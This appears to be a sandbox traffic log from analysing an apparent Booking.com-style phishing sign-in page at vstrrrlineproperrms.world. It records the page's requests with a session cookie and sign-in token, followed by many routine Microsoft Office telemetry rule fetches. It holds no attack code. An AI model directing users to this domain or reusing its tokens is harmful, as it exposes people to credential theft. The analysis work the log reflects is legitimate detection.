cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jmkI
Source: global traffic	HTTP traffic detected: GET /Reservation_files/319302672.jpg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jm
Source: global traffic	HTTP traffic detected: GET /Reservation_files/333642474.jpg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jm
Source: global traffic	HTTP traffic detected: GET /Reservation_files/b_logo_blue.png HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.
Source: global traffic	HTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1host: code.jquery.comorigin: https://vstrrrlineproperrms.worldsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://vstrrrlineproperrms.world/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1host: partner.booking.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://vstrrrlineproperrms.worldsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: manifestreferer: https://vstrrrlineproperrms.world/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /static/favicon.svg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jmkIir2MDzKL.zc
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
